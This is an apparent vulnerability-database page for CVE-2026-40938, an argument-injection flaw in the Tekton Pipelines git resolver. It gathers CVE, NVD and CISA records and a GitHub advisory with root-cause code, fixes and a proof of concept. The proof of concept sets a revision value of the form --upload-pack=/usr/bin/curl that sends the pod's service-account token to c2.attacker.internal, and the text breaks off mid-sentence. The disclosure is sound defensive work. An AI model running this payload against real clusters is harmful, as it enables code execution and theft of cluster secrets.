Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-40938 (GCVE-0-2026-40938)
Vulnerability from cvelistv5 – Published: 2026-04-21 20:45 – Updated: 2026-05-21 22:40
VLAI
EPSS
Title
Tekton Pipelines: Git Resolver Unsanitized Revision Parameter Enables git Argument Injection Leading to RCE
Summary
Tekton Pipelines project provides k8s-style resources for declaring CI/CD-style pipelines. Starting in version 1.0.0 and prior to versions 1.0.2, 1.3.4, 1.6.2, 1.9.3, and 1.11.1, the git resolver's revision parameter is passed directly as a positional argument to git fetch without any validation that it does not begin with a - character. Because git parses flags from mixed positional arguments, an attacker can inject arbitrary git fetch flags such as --upload-pack=<binary>. Combined with the validateRepoURL function explicitly permitting URLs that begin with / (local filesystem paths), a tenant who can submit ResolutionRequest objects can chain these two behaviors to execute an arbitrary binary on the resolver pod. The tekton-pipelines-resolvers ServiceAccount holds cluster-wide get/list/watch on all Secrets, so code execution on the resolver pod enables full cluster-wide secret exfiltration. Versions 1.0.2, 1.3.4, 1.6.2, 1.9.3, and 1.11.1 fix the issue.
Severity
7.5 (High)
SSVC
Exploitation: poc
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-88 - Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/tektoncd/pipeline/security/adv… | x_refsource_CONFIRM |
| https://github.com/tektoncd/pipeline/releases/tag… | x_refsource_MISC |
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-40938",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-22T18:31:54.871943Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-22T18:36:16.790Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "pipeline",
"vendor": "tektoncd",
"versions": [
{
"status": "affected",
"version": "\u003e= 1.0.0, \u003c 1.0.2"
},
{
"status": "affected",
"version": "\u003e= 1.2.0, \u003c 1.3.4"
},
{
"status": "affected",
"version": "\u003e= 1.4.0, \u003c 1.6.2"
},
{
"status": "affected",
"version": "\u003e= 1.7.0, \u003c 1.9.3"
},
{
"status": "affected",
"version": "\u003e= 1.10.0, \u003c 1.11.1"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Tekton Pipelines project provides k8s-style resources for declaring CI/CD-style pipelines. Starting in version 1.0.0 and prior to versions 1.0.2, 1.3.4, 1.6.2, 1.9.3, and 1.11.1, the git resolver\u0027s revision parameter is passed directly as a positional argument to git fetch without any validation that it does not begin with a - character. Because git parses flags from mixed positional arguments, an attacker can inject arbitrary git fetch flags such as --upload-pack=\u003cbinary\u003e. Combined with the validateRepoURL function explicitly permitting URLs that begin with / (local filesystem paths), a tenant who can submit ResolutionRequest objects can chain these two behaviors to execute an arbitrary binary on the resolver pod. The tekton-pipelines-resolvers ServiceAccount holds cluster-wide get/list/watch on all Secrets, so code execution on the resolver pod enables full cluster-wide secret exfiltration. Versions 1.0.2, 1.3.4, 1.6.2, 1.9.3, and 1.11.1 fix the issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-88",
"description": "CWE-88: Improper Neutralization of Argument Delimiters in a Command (\u0027Argument Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-21T22:40:09.754Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq"
},
{
"name": "https://github.com/tektoncd/pipeline/releases/tag/v1.11.1",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/tektoncd/pipeline/releases/tag/v1.11.1"
}
],
"source": {
"advisory": "GHSA-94jr-7pqp-xhcq",
"discovery": "UNKNOWN"
},
"title": "Tekton Pipelines: Git Resolver Unsanitized Revision Parameter Enables git Argument Injection Leading to RCE"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-40938",
"datePublished": "2026-04-21T20:45:24.658Z",
"dateReserved": "2026-04-15T20:40:15.518Z",
"dateUpdated": "2026-05-21T22:40:09.754Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-40938",
"date": "2026-06-08",
"epss": "0.00035",
"percentile": "0.10737"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-40938\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-21T21:16:46.283\",\"lastModified\":\"2026-05-21T23:16:44.873\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Tekton Pipelines project provides k8s-style resources for declaring CI/CD-style pipelines. Starting in version 1.0.0 and prior to versions 1.0.2, 1.3.4, 1.6.2, 1.9.3, and 1.11.1, the git resolver\u0027s revision parameter is passed directly as a positional argument to git fetch without any validation that it does not begin with a - character. Because git parses flags from mixed positional arguments, an attacker can inject arbitrary git fetch flags such as --upload-pack=\u003cbinary\u003e. Combined with the validateRepoURL function explicitly permitting URLs that begin with / (local filesystem paths), a tenant who can submit ResolutionRequest objects can chain these two behaviors to execute an arbitrary binary on the resolver pod. The tekton-pipelines-resolvers ServiceAccount holds cluster-wide get/list/watch on all Secrets, so code execution on the resolver pod enables full cluster-wide secret exfiltration. Versions 1.0.2, 1.3.4, 1.6.2, 1.9.3, and 1.11.1 fix the issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.6,\"impactScore\":5.9},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H\",\"baseScore\":8.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":6.0}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-88\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:linuxfoundation:tekton_pipelines:*:*:*:*:*:go:*:*\",\"versionStartIncluding\":\"1.0.0\",\"versionEndExcluding\":\"1.11.0\",\"matchCriteriaId\":\"64DC28D5-E9D3-4D6A-8006-ADDE91D144BA\"}]}]}],\"references\":[{\"url\":\"https://github.com/tektoncd/pipeline/releases/tag/v1.11.1\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-40938\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-22T18:31:54.871943Z\"}}}], \"references\": [{\"url\": \"https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-22T18:13:47.095Z\"}}], \"cna\": {\"title\": \"Tekton Pipelines: Git Resolver Unsanitized Revision Parameter Enables git Argument Injection Leading to RCE\", \"source\": {\"advisory\": \"GHSA-94jr-7pqp-xhcq\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"tektoncd\", \"product\": \"pipeline\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 1.0.0, \u003c 1.0.2\"}, {\"status\": \"affected\", \"version\": \"\u003e= 1.2.0, \u003c 1.3.4\"}, {\"status\": \"affected\", \"version\": \"\u003e= 1.4.0, \u003c 1.6.2\"}, {\"status\": \"affected\", \"version\": \"\u003e= 1.7.0, \u003c 1.9.3\"}, {\"status\": \"affected\", \"version\": \"\u003e= 1.10.0, \u003c 1.11.1\"}]}], \"references\": [{\"url\": \"https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq\", \"name\": \"https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/tektoncd/pipeline/releases/tag/v1.11.1\", \"name\": \"https://github.com/tektoncd/pipeline/releases/tag/v1.11.1\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Tekton Pipelines project provides k8s-style resources for declaring CI/CD-style pipelines. Starting in version 1.0.0 and prior to versions 1.0.2, 1.3.4, 1.6.2, 1.9.3, and 1.11.1, the git resolver\u0027s revision parameter is passed directly as a positional argument to git fetch without any validation that it does not begin with a - character. Because git parses flags from mixed positional arguments, an attacker can inject arbitrary git fetch flags such as --upload-pack=\u003cbinary\u003e. Combined with the validateRepoURL function explicitly permitting URLs that begin with / (local filesystem paths), a tenant who can submit ResolutionRequest objects can chain these two behaviors to execute an arbitrary binary on the resolver pod. The tekton-pipelines-resolvers ServiceAccount holds cluster-wide get/list/watch on all Secrets, so code execution on the resolver pod enables full cluster-wide secret exfiltration. Versions 1.0.2, 1.3.4, 1.6.2, 1.9.3, and 1.11.1 fix the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-88\", \"description\": \"CWE-88: Improper Neutralization of Argument Delimiters in a Command (\u0027Argument Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-21T22:40:09.754Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-40938\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-21T22:40:09.754Z\", \"dateReserved\": \"2026-04-15T20:40:15.518Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-04-21T20:45:24.658Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-40938
Vulnerability from fkie_nvd - Published: 2026-04-21 21:16 - Updated: 2026-05-21 23:16
Severity
7.5 (High) - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
8.5 (High) - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
8.5 (High) - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
Summary
Tekton Pipelines project provides k8s-style resources for declaring CI/CD-style pipelines. Starting in version 1.0.0 and prior to versions 1.0.2, 1.3.4, 1.6.2, 1.9.3, and 1.11.1, the git resolver's revision parameter is passed directly as a positional argument to git fetch without any validation that it does not begin with a - character. Because git parses flags from mixed positional arguments, an attacker can inject arbitrary git fetch flags such as --upload-pack=<binary>. Combined with the validateRepoURL function explicitly permitting URLs that begin with / (local filesystem paths), a tenant who can submit ResolutionRequest objects can chain these two behaviors to execute an arbitrary binary on the resolver pod. The tekton-pipelines-resolvers ServiceAccount holds cluster-wide get/list/watch on all Secrets, so code execution on the resolver pod enables full cluster-wide secret exfiltration. Versions 1.0.2, 1.3.4, 1.6.2, 1.9.3, and 1.11.1 fix the issue.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| linuxfoundation | tekton_pipelines | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:linuxfoundation:tekton_pipelines:*:*:*:*:*:go:*:*",
"matchCriteriaId": "64DC28D5-E9D3-4D6A-8006-ADDE91D144BA",
"versionEndExcluding": "1.11.0",
"versionStartIncluding": "1.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Tekton Pipelines project provides k8s-style resources for declaring CI/CD-style pipelines. Starting in version 1.0.0 and prior to versions 1.0.2, 1.3.4, 1.6.2, 1.9.3, and 1.11.1, the git resolver\u0027s revision parameter is passed directly as a positional argument to git fetch without any validation that it does not begin with a - character. Because git parses flags from mixed positional arguments, an attacker can inject arbitrary git fetch flags such as --upload-pack=\u003cbinary\u003e. Combined with the validateRepoURL function explicitly permitting URLs that begin with / (local filesystem paths), a tenant who can submit ResolutionRequest objects can chain these two behaviors to execute an arbitrary binary on the resolver pod. The tekton-pipelines-resolvers ServiceAccount holds cluster-wide get/list/watch on all Secrets, so code execution on the resolver pod enables full cluster-wide secret exfiltration. Versions 1.0.2, 1.3.4, 1.6.2, 1.9.3, and 1.11.1 fix the issue."
}
],
"id": "CVE-2026-40938",
"lastModified": "2026-05-21T23:16:44.873",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 6.0,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2026-04-21T21:16:46.283",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes"
],
"url": "https://github.com/tektoncd/pipeline/releases/tag/v1.11.1"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-88"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-94JR-7PQP-XHCQ
Vulnerability from github – Published: 2026-04-21 20:28 – Updated: 2026-05-21 22:40
VLAI
Summary
Tekton Pipeline: Git Resolver Unsanitized Revision Parameter Enables git Argument Injection Leading to RCE
Details
Summary
The git resolver's revision parameter is passed directly as a positional argument to git fetch without any validation that it does not begin with a - character. Because git parses flags from mixed positional arguments, an attacker can inject arbitrary git fetch flags such as --upload-pack=<binary>. Combined with the validateRepoURL function explicitly permitting URLs that begin with / (local filesystem paths), a tenant who can submit ResolutionRequest objects can chain these two behaviors to execute an arbitrary binary on the resolver pod. The tekton-pipelines-resolvers ServiceAccount holds cluster-wide get/list/watch on all Secrets, so code execution on the resolver pod enables full cluster-wide secret exfiltration.
Details
Root Cause 1 — Unvalidated revision parameter passed to git fetch
pkg/resolution/resolver/git/repository.go:85:
// pkg/resolution/resolver/git/repository.go lines 84-96
// 'revision' is the raw user-supplied string from the ResolutionRequest param.
// It is passed verbatim as a positional argument to git fetch:
func (repo *repository) checkout(ctx context.Context, revision string) error {
_, err := repo.execGit(ctx, "fetch", "origin", revision, "--depth=1")
// When revision == "--upload-pack=/usr/bin/curl", git parses it as the
// --upload-pack flag, not as a refspec — executing the binary locally.
if err != nil {
return fmt.Errorf("fetch: %w", err)
}
_, err = repo.execGit(ctx, "checkout", "FETCH_HEAD")
return err
}
execGit invokes exec.CommandContext("git", ...) — no shell is used, so shell metacharacters cannot be injected. However, git itself parses flags from mixed positional arguments. When revision = "--upload-pack=/path/to/binary", git receives this as the flag --upload-pack=/path/to/binary, not as a refspec. PopulateDefaultParams (resolver.go:418–424) applies only a leading-slash strip and a containsDotDot check on the pathInRepo parameter; the revision parameter receives no validation at all.
Root Cause 2 — validateRepoURL explicitly permits local filesystem paths
pkg/resolution/resolver/git/resolver.go:154-158:
// validateRepoURL validates if the given URL is a valid git, http, https URL or
// starting with a / (a local repository).
func validateRepoURL(url string) bool {
pattern := `^(/|[^@]+@[^:]+|(git|https?)://)`
re := regexp.MustCompile(pattern)
return re.MatchString(url)
}
Any URL beginning with / passes validation and is used directly as the argument to git clone. This means a local filesystem path such as /tmp/some-repo is a valid resolver URL.
Exploit Chain
--upload-pack=<binary> causes git to execute the specified binary as the upload-pack server when communicating with the remote. For local-path remotes (/path), git invokes the binary on the resolver pod itself with the repository path as its sole argument. Because the argument is passed via exec.Command as a single --upload-pack=<binary> string (not split by a shell), only binaries at known paths can be invoked — but several useful binaries exist in the resolver pod image (e.g., /bin/sh, /usr/bin/curl, /bin/cp).
Attack complexity is High because the exploit requires either:
- A valid git repository at a known, predicable path on the resolver pod (e.g., /tmp/<reponame>-<suffix> from a concurrent resolution), or
- A default-URL configuration pointing at a local path
PoC
# Step 1: Set up a local git repository to serve as the "origin"
# (in a real attack, the attacker would time this against a concurrent clone
# or use any pre-existing git repo path on the resolver pod)
git init /tmp/localrepo && cd /tmp/localrepo && git commit --allow-empty -m "init"
# Step 2: Craft a ResolutionRequest with injected --upload-pack flag
kubectl create -f - <<'EOF'
apiVersion: resolution.tekton.dev/v1beta1
kind: ResolutionRequest
metadata:
name: revision-injection-poc
namespace: default
labels:
resolution.tekton.dev/type: git
spec:
params:
- name: url
value: /tmp/localrepo
- name: revision
value: "--upload-pack=/usr/bin/curl http://c2.attacker.internal/$(cat /var/run/secrets/kubernetes.io/serviceaccount/token | base64 -w0)"
- name: pathInRepo
value: README.md
EOF
# The resolver pod executes:
# git -C <tmpdir> fetch origin \
# "--upload-pack=/usr/bin/curl http://c2.attacker.internal/..." \
# --depth=1
#
# For single-argument binaries (/bin/sh, /usr/bin/env, etc.):
# git -C <tmpdir> fetch origin "--upload-pack=/bin/sh" --depth=1
# Executes /bin/sh with the local repository path as argv[1].
# From /bin/sh, the attacker can use a pre-staged script (e.g., written
# via a workspace volume) to achieve arbitrary command execution.
Verified: git fetch origin --upload-pack=/tmp/test-exec.sh --depth=1 executes test-exec.sh on the local machine even when origin is a local filesystem path. Exit code 0 was observed with the test binary executed successfully.
Impact
- Code execution on the resolver pod when an attacker can stage or predict a valid git repository path in
/tmpon the resolver pod. - Full cluster-wide Secret exfiltration: The
tekton-pipelines-resolversServiceAccount is bound to a ClusterRole that grantsget/list/watchon all Secrets in all namespaces (config/resolvers/200-clusterrole.yaml). Code execution on the resolver pod is therefore equivalent to reading every Secret in the cluster. - Privilege escalation: Secrets typically include kubeconfig files, cloud provider credentials, and API tokens — reading them enables lateral movement to cloud infrastructure.
- Both the deprecated resolver (
pkg/resolution/resolver/git/) and the current resolver (pkg/remoteresolution/resolver/git/) share the samevalidateRepoURL,PopulateDefaultParams, andcheckoutimplementation via the sharedgitpackage. Both are affected.
Recommended Fix
Fix 1 — Validate that revision does not begin with - in PopulateDefaultParams:
if strings.HasPrefix(paramsMap[RevisionParam], "-") {
return nil, fmt.Errorf("invalid revision %q: must not begin with '-'", paramsMap[RevisionParam])
}
Fix 2 — Restrict validateRepoURL to remote URLs only (remove local-path support in production builds, or add an explicit admin opt-in feature flag):
func validateRepoURL(url string) bool {
pattern := `^([^@]+@[^:]+|(git|https?)://)`
re := regexp.MustCompile(pattern)
return re.MatchString(url)
}
Applying Fix 1 alone is sufficient to prevent the argument injection. Fix 2 eliminates the enabling condition (local-path remotes for which --upload-pack runs locally) and reduces attack surface further.
Severity
7.5 (High)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/tektoncd/pipeline"
},
"ranges": [
{
"events": [
{
"introduced": "1.10.0"
},
{
"fixed": "1.11.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/tektoncd/pipeline"
},
"ranges": [
{
"events": [
{
"introduced": "1.7.0"
},
{
"fixed": "1.9.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/tektoncd/pipeline"
},
"ranges": [
{
"events": [
{
"introduced": "1.4.0"
},
{
"fixed": "1.6.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/tektoncd/pipeline"
},
"ranges": [
{
"events": [
{
"introduced": "1.2.0"
},
{
"fixed": "1.3.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/tektoncd/pipeline"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.0.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-40938"
],
"database_specific": {
"cwe_ids": [
"CWE-88"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-21T20:28:36Z",
"nvd_published_at": "2026-04-21T21:16:46Z",
"severity": "HIGH"
},
"details": "## Summary\n\nThe git resolver\u0027s `revision` parameter is passed directly as a positional argument to `git fetch` without any validation that it does not begin with a `-` character. Because git parses flags from mixed positional arguments, an attacker can inject arbitrary `git fetch` flags such as `--upload-pack=\u003cbinary\u003e`. Combined with the `validateRepoURL` function explicitly permitting URLs that begin with `/` (local filesystem paths), a tenant who can submit `ResolutionRequest` objects can chain these two behaviors to execute an arbitrary binary on the resolver pod. The `tekton-pipelines-resolvers` ServiceAccount holds cluster-wide `get/list/watch` on all Secrets, so code execution on the resolver pod enables full cluster-wide secret exfiltration.\n\n## Details\n\n### Root Cause 1 \u2014 Unvalidated `revision` parameter passed to `git fetch`\n\n`pkg/resolution/resolver/git/repository.go:85`:\n\n```go\n// pkg/resolution/resolver/git/repository.go lines 84-96\n// \u0027revision\u0027 is the raw user-supplied string from the ResolutionRequest param.\n// It is passed verbatim as a positional argument to git fetch:\nfunc (repo *repository) checkout(ctx context.Context, revision string) error {\n _, err := repo.execGit(ctx, \"fetch\", \"origin\", revision, \"--depth=1\")\n // When revision == \"--upload-pack=/usr/bin/curl\", git parses it as the\n // --upload-pack flag, not as a refspec \u2014 executing the binary locally.\n if err != nil {\n return fmt.Errorf(\"fetch: %w\", err)\n }\n _, err = repo.execGit(ctx, \"checkout\", \"FETCH_HEAD\")\n return err\n}\n```\n\n`execGit` invokes `exec.CommandContext(\"git\", ...)` \u2014 no shell is used, so shell metacharacters cannot be injected. However, git itself parses flags from mixed positional arguments. When `revision = \"--upload-pack=/path/to/binary\"`, git receives this as the flag `--upload-pack=/path/to/binary`, not as a refspec. `PopulateDefaultParams` (`resolver.go:418\u2013424`) applies only a leading-slash strip and a `containsDotDot` check on the `pathInRepo` parameter; the `revision` parameter receives no validation at all.\n\n### Root Cause 2 \u2014 `validateRepoURL` explicitly permits local filesystem paths\n\n`pkg/resolution/resolver/git/resolver.go:154-158`:\n\n```go\n// validateRepoURL validates if the given URL is a valid git, http, https URL or\n// starting with a / (a local repository).\nfunc validateRepoURL(url string) bool {\n pattern := `^(/|[^@]+@[^:]+|(git|https?)://)`\n re := regexp.MustCompile(pattern)\n return re.MatchString(url)\n}\n```\n\nAny URL beginning with `/` passes validation and is used directly as the argument to `git clone`. This means a local filesystem path such as `/tmp/some-repo` is a valid resolver URL.\n\n### Exploit Chain\n\n`--upload-pack=\u003cbinary\u003e` causes git to execute the specified binary as the upload-pack server when communicating with the remote. For local-path remotes (`/path`), git invokes the binary on the resolver pod itself with the repository path as its sole argument. Because the argument is passed via `exec.Command` as a single `--upload-pack=\u003cbinary\u003e` string (not split by a shell), only binaries at known paths can be invoked \u2014 but several useful binaries exist in the resolver pod image (e.g., `/bin/sh`, `/usr/bin/curl`, `/bin/cp`).\n\nAttack complexity is High because the exploit requires either:\n- A valid git repository at a known, predicable path on the resolver pod (e.g., `/tmp/\u003creponame\u003e-\u003csuffix\u003e` from a concurrent resolution), or\n- A default-URL configuration pointing at a local path\n\n## PoC\n\n```bash\n# Step 1: Set up a local git repository to serve as the \"origin\"\n# (in a real attack, the attacker would time this against a concurrent clone\n# or use any pre-existing git repo path on the resolver pod)\ngit init /tmp/localrepo \u0026\u0026 cd /tmp/localrepo \u0026\u0026 git commit --allow-empty -m \"init\"\n\n# Step 2: Craft a ResolutionRequest with injected --upload-pack flag\nkubectl create -f - \u003c\u003c\u0027EOF\u0027\napiVersion: resolution.tekton.dev/v1beta1\nkind: ResolutionRequest\nmetadata:\n name: revision-injection-poc\n namespace: default\n labels:\n resolution.tekton.dev/type: git\nspec:\n params:\n - name: url\n value: /tmp/localrepo\n - name: revision\n value: \"--upload-pack=/usr/bin/curl http://c2.attacker.internal/$(cat /var/run/secrets/kubernetes.io/serviceaccount/token | base64 -w0)\"\n - name: pathInRepo\n value: README.md\nEOF\n\n# The resolver pod executes:\n# git -C \u003ctmpdir\u003e fetch origin \\\n# \"--upload-pack=/usr/bin/curl http://c2.attacker.internal/...\" \\\n# --depth=1\n#\n# For single-argument binaries (/bin/sh, /usr/bin/env, etc.):\n# git -C \u003ctmpdir\u003e fetch origin \"--upload-pack=/bin/sh\" --depth=1\n# Executes /bin/sh with the local repository path as argv[1].\n# From /bin/sh, the attacker can use a pre-staged script (e.g., written\n# via a workspace volume) to achieve arbitrary command execution.\n```\n\n**Verified**: `git fetch origin --upload-pack=/tmp/test-exec.sh --depth=1` executes `test-exec.sh` on the local machine even when `origin` is a local filesystem path. Exit code 0 was observed with the test binary executed successfully.\n\n## Impact\n\n- **Code execution on the resolver pod** when an attacker can stage or predict a valid git repository path in `/tmp` on the resolver pod.\n- **Full cluster-wide Secret exfiltration**: The `tekton-pipelines-resolvers` ServiceAccount is bound to a ClusterRole that grants `get/list/watch` on all Secrets in all namespaces (`config/resolvers/200-clusterrole.yaml`). Code execution on the resolver pod is therefore equivalent to reading every Secret in the cluster.\n- **Privilege escalation**: Secrets typically include kubeconfig files, cloud provider credentials, and API tokens \u2014 reading them enables lateral movement to cloud infrastructure.\n- Both the deprecated resolver (`pkg/resolution/resolver/git/`) and the current resolver (`pkg/remoteresolution/resolver/git/`) share the same `validateRepoURL`, 